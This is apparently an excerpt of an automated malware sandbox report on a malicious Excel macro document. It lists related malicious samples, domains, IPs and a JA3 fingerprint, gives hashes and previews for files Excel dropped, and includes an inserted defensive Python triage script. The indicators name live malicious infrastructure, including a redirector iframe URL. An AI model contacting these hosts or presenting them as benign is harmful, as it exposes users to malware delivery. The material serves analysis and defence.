                                                                                                                                                                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                    14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse

                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                      industrialarttextile.comstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      anaheimdermatologists.comstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2

                                                                                                                                                                                                                      ASN

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                      UNIFIEDLAYER-AS-1USstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.169.22
                                                                                                                                                                                                                      ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.185.244
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 50.87.249.219
                                                                                                                                                                                                                      presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 50.87.249.219
                                                                                                                                                                                                                      GK58.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.21.136
                                                                                                                                                                                                                      catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.20.98
                                                                                                                                                                                                                      catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.20.98
                                                                                                                                                                                                                      4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 50.87.166.59
                                                                                                                                                                                                                      c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 108.179.242.122
                                                                                                                                                                                                                      c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 108.179.242.122
                                                                                                                                                                                                                      6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.24.47
                                                                                                                                                                                                                      DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.169.22
                                                                                                                                                                                                                      generated check 662732.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.177.61
                                                                                                                                                                                                                      4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.24.47
UNIFIEDLAYER-AS-1 US
  Associated Sample Name / URL | Detection | Context
  statistic-2069354685.xlsm | malicious | 192.254.233.89
  statistic-2070252624.xlsm | malicious | 192.254.233.89
  statistic-2072807337.xlsm | malicious | 192.254.233.89
  INDIA ORDERD CH2323ED.exe | malicious | 162.241.169.22
  ARIX SRLVl (MN) - Italy.exe | malicious | 192.254.185.244
  statistic-207394368.xlsm | malicious | 192.254.233.89
  statistic-2072807337.xlsm | malicious | 192.254.233.89
  statistic-207394368.xlsm | malicious | 192.254.233.89
  presentation.jar | malicious | 50.87.249.219
  presentation.jar | malicious | 50.87.249.219
  GK58.vbs | malicious | 192.185.21.136
  catalog-1521295750.xlsm | malicious | 192.185.20.98
  catalog-1521295750.xlsm | malicious | 192.185.20.98
  4GGwmv0AJm.exe | malicious | 50.87.166.59
  c647b2da_by_Libranalysis.exe | malicious | 108.179.242.122
  c647b2da_by_Libranalysis.exe | malicious | 108.179.242.122
  6613n246zm543w.xlsb | malicious | 162.241.24.47
  DEMARG MALAYHCU21345.exe | malicious | 162.241.169.22
  generated check 662732.xlsm | malicious | 192.185.177.61
  4Y2I7k0.xlsb | malicious | 162.241.24.47

JA3 Fingerprints

Match: 37f463bf4616ecd445d4a1937da06e19
  Associated Sample Name / URL | Detection | Context
  statistic-2072807337.xlsm | malicious | 192.185.5.2, 192.254.233.89
  statistic-207394368.xlsm | malicious | 192.185.5.2, 192.254.233.89
  f97e137e_by_Libranalysis.exe | malicious | 192.185.5.2, 192.254.233.89
  e1df57de_by_Libranalysis.xls | malicious | 192.185.5.2, 192.254.233.89
  MV RED SEA.docx | malicious | 192.185.5.2, 192.254.233.89
  MyUY1HeWNL.exe | malicious | 192.185.5.2, 192.254.233.89
  IMG-WA7905432.exe | malicious | 192.185.5.2, 192.254.233.89
  catalog-1521295750.xlsm | malicious | 192.185.5.2, 192.254.233.89
  Documents_111651917_375818984.xls | malicious | 192.185.5.2, 192.254.233.89
  Remittance Advice pdf.exe | malicious | 192.185.5.2, 192.254.233.89
  #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htm | malicious | 192.185.5.2, 192.254.233.89
  Documents_95326461_1831689059.xls | malicious | 192.185.5.2, 192.254.233.89
  Tree Top.html | malicious | 192.185.5.2, 192.254.233.89
  PT6-1152.doc | malicious | 192.185.5.2, 192.254.233.89
  s.dll | malicious | 192.185.5.2, 192.254.233.89
  setup-lightshot.exe | malicious | 192.185.5.2, 192.254.233.89
  s.dll | malicious | 192.185.5.2, 192.254.233.89
  8a793b14_by_Libranalysis.exe | malicious | 192.185.5.2, 192.254.233.89
  pic05678063.exe | malicious | 192.185.5.2, 192.254.233.89
  6de2089f_by_Libranalysis.exe | malicious | 192.185.5.2, 192.254.233.89

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D1505509-3A71-4C04-B572-82F28F0AAB3F
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 134558
Entropy (8bit): 5.3683905157117495
Encrypted: false
SSDEEP: 1536:ucQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:tEQ9DQW+zPXO8
MD5: F84A8D97D3B0194EE8159EDCA93E69A7
SHA1: 7C720FB7E06341B4638A7B509CE545EE1111C23C
SHA-256: D5A495CC92719963F8B6399B5B027FFD87089D84C4A9D9E628EAF775BD94227D
SHA-512: 3D6FCF182518F344B44ADCE6EA650436D4107664E1A4B6E673AF662BC0317DDAF9E9D09C67C6F3B705A5352250A64658348C4328F0EFED94C4C7156823B405D7
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T11:48:09">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\10CFADED.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 8301
Entropy (8bit): 7.970711494690041
Encrypted: false
SSDEEP: 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
MD5: D8574C9CC4123EF67C8B600850BE52EE
SHA1: 5547AC473B3523BA2410E04B75E37B1944EE0CCC
SHA-256: ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
SHA-512: 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
Malicious: false
Reputation: moderate, very likely benign file
Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\128C6383.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 557
Entropy (8bit): 7.343009301479381
Encrypted: false
SSDEEP: 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                                                                                      MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                                                                                      SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                                                                                      SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                                                                                      SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\95FD430A.png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34787
                                                                                                                                                                                                                      Entropy (8bit):7.9883689087667955
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:XbyxVN2hP86XpVBxUmtCQHcQpKvtcFM/MoJ97bk3Ueu:m92hjPcQpWUot9Eg
                                                                                                                                                                                                                      MD5:2C5A59B7F30E5E41412EC22FDEA1DBB5
                                                                                                                                                                                                                      SHA1:9A64FB6A68683EEC580A881725DBD146E80D06B1
                                                                                                                                                                                                                      SHA-256:E872E66F60AE5651AE96A2C2A88D07B0D1C96CDDD45F787AB04237891AD4E8FB
                                                                                                                                                                                                                      SHA-512:2D494F44E1DA36794C3E707BF1173EE63E2CF3101E3B5EA60D71A194DA9A6A1EB6B9C166B7C1ACAA2D455B9C6413D0FEE40AD38972C076183EF167818D7E92EC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.>..{'.......".bA.6.6..o/3...:......b....{HBBz./........[..%yI.!>...}.^{.o.........^..R.......=..c..-Z.n]cc...W.^...........z..2.9s.<....?|...._j.&.....R.......K...\.V..ukS..sgKKKWWWkk._@s....<x.Q..t..1bt.5k.QG....,X0f..Y.T...............k..y..k..K6^....v.x}..p....vX.MK..5.....j...X....8...~......z.{.aJ.Q...{.._|...|.....{.ui..M.)^...I.....};>..[n...../^..hnn.t.^.}..S.Ly.3.q.W.v.i)d.....W.x=p.".d@k.(.y...kE..P......mH"F^...\q..v)....K...R...:O..i..G......?...!.....y.^..W.....:u...).c.j ..=....X......<..u.]w.7.H.;.GE*...x.;^..WM.8.....G..x.?.Z*....:F..~..k..f.%.kN {..}(.d..C.z...2.G....x...S*.^....<..?..o...ME`......s.9.{.......>;.5....o.T....,..I.....?...o.w..6../~..>.....S.i1.Q.)^..VIe.........~._../..G...!C......|..k]]]v.x..wt......=.Y0...Z.9......=t.....]{S.)^.Mm...p..m......M.6....r.L.6MT..3'M.4{.l~.P[h....Wtttx........#.OR.\.r.e@
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\98923FA8.png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                                                                      Entropy (8bit):7.595467031611744
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                                                                      MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                                                                      SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                                                                      SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                                                                      SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\suspendedpage[1].htm
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):494
                                                                                                                                                                                                                      Entropy (8bit):4.962239405540505
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                                                                                                                                                                      MD5:0357AA49EA850B11B99D09A2479C321B
                                                                                                                                                                                                                      SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                                                                                                                                                                      SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                                                                                                                                                                      SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      IE Cache URL:https://anaheimdermatologists.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                                                                                      Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\D1C40000
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):107618
                                                                                                                                                                                                                      Entropy (8bit):7.916016112653699
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfz:nl+yo9opH8x+3xs6ZQ7
                                                                                                                                                                                                                      MD5:405ECDBABD8FD62D8C20BD4F08267DE2
                                                                                                                                                                                                                      SHA1:483D3C78AF0413586863AAFA3B08F6D6AF9C2B5D
                                                                                                                                                                                                                      SHA-256:ABAE0B65B6360E8C1423317D96F9E63098BAC4059E75333CB03A9DD3CBDAE66A
                                                                                                                                                                                                                      SHA-512:E71DB6202577C9CEEBE13C9DACE77F623D9713E2B2564F3BAF692B53D30C41052DC6661AE269F3857F2C6C8116F6BB96D4C49DFA54E66E2FE82E87D684BFCE20
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
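Two of the artifacts above deserve a second look during triage. suspendedpage[1].htm, the only file in the listing with Category "downloaded", is what EXCEL.EXE received from https://anaheimdermatologists.com/cgi-sys/suspendedpage.cgi: the hosting provider's "account suspended" placeholder (cPanel serves it from /cgi-sys/), whose entire content is an iframe pointing at a third-party redirector. It is therefore a benign HTML shell rather than executable content, but the iframe URL is still worth recording. The temp file D1C40000 is typed as plain "data", yet its preview carries a PK local-file header and the name [Content_Types].xml part-way in, the markers of an OOXML container that does not begin at byte 0. The following Python is an added example, not Joe Sandbox code, showing how to recompute the listing's per-file fields (8-bit entropy, type, dotted Preview) and to pull URLs out of text artifacts; the sample files it runs on are constructed here, not the dropped files from this report.

```python
"""Recompute the per-file triage fields of a sandbox dropped-file listing
(8-bit entropy, type from magic bytes, dotted Preview) and pull URLs out of
text artifacts. Added example, not Joe Sandbox code; the sample files below
are constructed, not the dropped files from this report."""
import math
import re
from collections import Counter

# Signatures checked at offset 0. A ZIP local-file header is additionally
# searched for at any offset, since Office temp files can carry an OOXML
# container that does not start at byte 0 (the D1C40000 preview shows
# 'PK' and '[Content_Types].xml' only part-way in).
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "PNG image"),
    (b"PK\x03\x04", "ZIP archive"),
    (b"L\x00\x00\x00\x01\x14\x02\x00", "MS Windows shortcut (LNK)"),
    (b"MZ", "PE executable"),
]
URL_RE = re.compile(rb"https?://[^\s\"'<>]+")


def entropy8(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0..8.0 (the 'Entropy (8bit)' field)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def preview(data: bytes, limit: int = 64) -> str:
    """Printable ASCII kept as-is, every other byte shown as '.', like the 'Preview' field."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:limit])


def identify(data: bytes) -> str:
    """Type from magic bytes, with a fallback scan for an embedded ZIP header."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            if name == "ZIP archive" and b"[Content_Types].xml" in data:
                return "ZIP archive (OOXML container)"
            return name
    head = data[:512].lower()
    if b"<!doctype html" in head or b"<html" in head:
        return "HTML document"
    off = data.find(b"PK\x03\x04")
    if off > 0:
        return f"data (ZIP local header at offset {off})"
    return "data"


def extract_urls(data: bytes) -> list:
    """URLs embedded in a text artifact, e.g. the iframe src of a hosting
    'account suspended' page: an indicator even though the page itself is benign."""
    return [m.decode("ascii", "replace") for m in URL_RE.findall(data)]


def triage(name: str, data: bytes) -> dict:
    ent = entropy8(data)
    return {
        "name": name,
        "size": len(data),
        "type": identify(data),
        "entropy": round(ent, 3),
        # Compressed or encrypted content sits near 8 bits/byte; plain text near 4-5.
        "high_entropy": ent > 7.0,
        "preview": preview(data),
        "urls": extract_urls(data),
    }


# Constructed samples (not the report's files): a PNG-like blob, a placeholder
# page with an iframe to a hypothetical redirector, and a temp file with an
# OOXML container starting 32 bytes in.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(range(256)) * 2
SAMPLE_HTML = (b'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">\n<html><body>'
               b'<iframe src="http://redirect.example/?dn=referer_detect&pid=TEST"></iframe>'
               b'</body></html>\n')
SAMPLE_TMP = b"\x00" * 32 + b"PK\x03\x04" + b"\x14\x00" * 13 + b"[Content_Types].xml"

if __name__ == "__main__":
    for fname, blob in [("a.png", SAMPLE_PNG), ("suspendedpage.htm", SAMPLE_HTML), ("D1C40000", SAMPLE_TMP)]:
        print(triage(fname, blob))
```

The entropy threshold is a heuristic: the PNGs above score 7.3 to 7.99 because their IDAT streams are deflate-compressed, so high entropy alone does not mean packed malware; pair it with the type and with where the magic bytes sit.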
                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue May 4 10:48:12 2021, atime=Tue May 4 10:48:12 2021, length=8192, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):904
                                                                                                                                                                                                                      Entropy (8bit):4.659727920923173
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:87XUrJjduCH2KOvEE4XEsUk7uX+WrjAZ/DYbDInRSeuSeL44t2Y+xIBjKZm:8Yxi4EHkiBAZbcDA37aB6m
                                                                                                                                                                                                                      MD5:F6369CC18C34A93D235C8BC862D5497F
                                                                                                                                                                                                                      SHA1:6BFAC0282760432AFA904C94455CEAEF989A62BC
                                                                                                                                                                                                                      SHA-256:E526B9F1AB8F838FC8B8161DCFD03A5BDFF2FA95EA7C35B50735BBDD98371588
                                                                                                                                                                                                                      SHA-512:3BEF03B505FE59788CF707F726B9D213AF46F59D2F8E5CB2E407EBA5603F0B19F0E28CEADEDED0BC52A8172E767615304B61229176C6F2B80FEA3770091DE444
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: L..................F.............-..{$.\.@.....\.@... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.]....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.]....#J....................3[..j.o.n.e.s.....~.1......R.^..Desktop.h.......N...R.^.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......610930...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
